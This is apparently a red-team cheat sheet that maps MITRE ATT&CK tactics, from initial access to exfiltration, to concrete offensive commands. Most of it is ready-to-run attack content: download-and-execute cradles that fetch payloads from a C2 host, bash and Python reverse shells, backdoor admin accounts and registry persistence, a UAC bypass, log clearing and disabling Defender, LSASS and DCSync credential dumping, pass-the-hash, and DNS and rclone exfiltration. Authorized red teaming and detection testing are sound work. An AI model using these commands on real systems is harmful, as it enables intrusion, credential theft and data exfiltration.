MITRE-REDTEAM
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Interactive tool: Red-Team Comms Builder
OVERVIEW#
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a knowledge base of adversary behavior based on real-world observations. This cheatsheet maps key techniques to practical tools and commands for red team operations. ATT&CK Matrix: Enterprise covers Windows, Linux, macOS, Cloud, Network, Containers. Current version: v16 (2024).
INITIAL ACCESS (TA0001)#
T1566 - Phishing
T1566.001 - Spearphishing Attachment
# Macro-enabled document delivery
# msfvenom -p windows/meterpreter/reverse_https LHOST=x LPORT=443 -f vba
# Use tools: GoPhish, Evilginx2 (for token phishing)
T1566.002 - Spearphishing Link
# Evilginx2 phishlet for credential/token harvesting
evilginx2> phishlets hostname o365 login.target.com
evilginx2> lures create o365
T1566.003 - Spearphishing via Service
# Target via LinkedIn, Teams, Slack messages
T1190 - Exploit Public-Facing Application
# Scan for known vulnerabilities
nuclei -u https://target.com -t cves/
# Web application exploitation
sqlmap -u "https://target.com/page?id=1" --batch
# Check for Log4Shell, Spring4Shell, etc.
T1133 - External Remote Services
# Brute force VPN, RDP, SSH
hydra -L users.txt -P pass.txt rdp://target
# Exploit exposed services (Citrix, Pulse Secure, FortiGate)
T1078 - Valid Accounts
# Credential stuffing with leaked databases
# Password spraying
spray.sh -smb target 'Spring2024!' users.txt
EXECUTION (TA0002)#
T1059 - Command and Scripting Interpreter
T1059.001 - PowerShell
powershell -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://c2/payload.ps1')"
# AMSI bypass first (see EVASION-TECHNIQUES.txt)
T1059.003 - Windows Command Shell
cmd.exe /c "certutil -urlcache -split -f http://c2/payload.exe %TEMP%\payload.exe"
T1059.004 - Unix Shell
bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'
curl http://c2/payload.sh | bash
T1059.005 - Visual Basic
# Office macro execution, WScript/CScript
T1059.006 - Python
python3 -c 'import socket,subprocess;s=socket.socket();s.connect(("ATTACKER",PORT));subprocess.call(["/bin/bash","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
T1047 - Windows Management Instrumentation
wmic /node:TARGET process call create "cmd.exe /c payload.exe"
# Impacket: wmiexec.py DOMAIN/user:pass@TARGET
T1053 - Scheduled Task/Job
T1053.005 - Scheduled Task (Windows)
schtasks /create /tn "Update" /tr "C:\payload.exe" /sc daily /ru SYSTEM
T1053.003 - Cron (Linux)
echo "* * * * * /tmp/shell.sh" | crontab -
PERSISTENCE (TA0003)#
T1547 - Boot or Logon Autostart Execution
T1547.001 - Registry Run Keys
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /d "C:\payload.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Svc /d "C:\payload.exe"
T1547.004 - Winlogon Helper DLL
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe,payload.exe"
T1547.009 - Shortcut Modification
# Replace .lnk target with payload path
T1053 - Scheduled Task/Job (also Persistence)
schtasks /create /tn "ChromeUpdate" /tr "powershell -ep bypass -f C:\update.ps1" /sc onlogon /ru SYSTEM
T1543 - Create or Modify System Process
T1543.003 - Windows Service
sc create SvcUpdate binPath= "C:\payload.exe" start= auto
# Or use PowerShell: New-Service -Name "SvcUpdate" -BinaryPathName "C:\payload.exe"
T1136 - Create Account
net user backdoor P@ssw0rd123 /add
net localgroup administrators backdoor /add
PRIVILEGE ESCALATION (TA0004)#
T1068 - Exploitation for Privilege Escalation
# Windows kernel exploits: PrintNightmare, EfsPotato, GodPotato
# Linux: DirtyPipe (CVE-2022-0847), PwnKit (CVE-2021-4034)
T1055 - Process Injection
# Inject into elevated process
# Tools: Process Hacker, Cobalt Strike inject command
T1548 - Abuse Elevation Control Mechanism
T1548.002 - UAC Bypass
# UACME project - multiple bypass methods
# fodhelper.exe bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
T1078 - Valid Accounts (also PrivEsc)
# Use credentials found during enumeration
# Kerberoasting, AS-REP roasting (see AD-EXPLOITATION.txt)
DEFENSE EVASION (TA0005)#
T1070 - Indicator Removal
T1070.001 - Clear Windows Event Logs
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
T1070.004 - File Deletion
# Remove tools after use
del /f /q C:\payload.exe
# Timestomping
timestomp.exe payload.exe -m "01/01/2023 12:00:00"
T1036 - Masquerading
T1036.005 - Match Legitimate Name
# Rename payload to svchost.exe, chrome.exe, etc.
rename payload.exe svchost.exe
T1027 - Obfuscated Files or Information
# Base64 encode payloads
certutil -encode payload.exe payload.b64
# PowerShell encoding
powershell -EncodedCommand <base64string>
T1562 - Impair Defenses
T1562.001 - Disable or Modify Tools
Set-MpPreference -DisableRealtimeMonitoring $true
# ETW patching, AMSI bypass (see EVASION-TECHNIQUES.txt)
CREDENTIAL ACCESS (TA0006)#
T1003 - OS Credential Dumping
T1003.001 - LSASS Memory
# Mimikatz
mimikatz# sekurlsa::logonpasswords
# ProcDump (LOLBin approach)
procdump.exe -ma lsass.exe lsass.dmp
# Comsvcs.dll MiniDump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> dump.bin full
T1003.003 - NTDS.dit
# DCSync (see AD-EXPLOITATION.txt)
mimikatz# lsadump::dcsync /domain:target.local /user:krbtgt
# ntdsutil snapshot
ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
T1003.006 - DCSync
secretsdump.py DOMAIN/user:pass@DC_IP
T1110 - Brute Force
# Password spraying
crackmapexec smb target -u users.txt -p 'Spring2024!' --continue-on-success
kerbrute passwordspray --dc DC_IP -d target.local users.txt 'Spring2024!'
T1558 - Steal or Forge Kerberos Tickets
# Kerberoasting
GetUserSPNs.py target.local/user:pass -dc-ip DC_IP -request
# AS-REP Roasting
GetNPUsers.py target.local/ -dc-ip DC_IP -usersfile users.txt -no-pass
LATERAL MOVEMENT (TA0008)#
T1021 - Remote Services
T1021.001 - RDP
xfreerdp /u:user /p:pass /v:TARGET /dynamic-resolution
T1021.002 - SMB/Admin Shares
# PsExec
psexec.py DOMAIN/user:pass@TARGET
# smbexec
smbexec.py DOMAIN/user:pass@TARGET
T1021.003 - DCOM
dcomexec.py DOMAIN/user:pass@TARGET
T1021.006 - WinRM
evil-winrm -i TARGET -u user -p pass
# PowerShell remoting
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user
T1550 - Use Alternate Authentication Material
T1550.002 - Pass the Hash
crackmapexec smb TARGET -u user -H NTLM_HASH
psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
T1550.003 - Pass the Ticket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass DOMAIN/user@TARGET
COLLECTION (TA0009)#
T1005 - Data from Local System
# Search for sensitive files
dir /s /b C:\Users\*.kdbx C:\Users\*.key C:\Users\*.pfx
findstr /si "password" *.txt *.xml *.config *.ini
T1039 - Data from Network Shared Drive
# Enumerate shares
crackmapexec smb TARGET -u user -p pass --shares
smbclient //TARGET/share -U user%pass
T1113 - Screen Capture
# Cobalt Strike: screenshot, screenwatch
# Metasploit: use post/multi/gather/screen_spy
EXFILTRATION (TA0010)#
T1041 - Exfiltration Over C2 Channel
# Use existing C2 channel (Cobalt Strike download)
T1048 - Exfiltration Over Alternative Protocol
T1048.003 - Over Unencrypted Protocol
# DNS exfiltration
dnscat2 --dns server=ATTACKER,domain=exfil.attacker.com
# ICMP exfiltration
# HTTP(S) exfiltration to cloud storage
T1567 - Exfiltration Over Web Service
# Exfil to cloud storage (OneDrive, Google Drive, S3)
# rclone copy C:\sensitive\ remote:exfil-bucket/
rclone copy /data remote:bucket --transfers=1 --bwlimit 100K
T1029 - Scheduled Transfer
# Stage data and exfil during off-hours to blend with traffic
RED TEAM OPSEC TIPS#
- Map your operations to ATT&CK techniques for reporting - Log all commands and actions with timestamps - Validate detection coverage against techniques used - Use technique IDs in debrief reports for blue team mapping - Test one technique at a time to identify detection gaps - Reference ATT&CK Navigator for coverage visualization - Check attack.mitre.org for technique detection guidance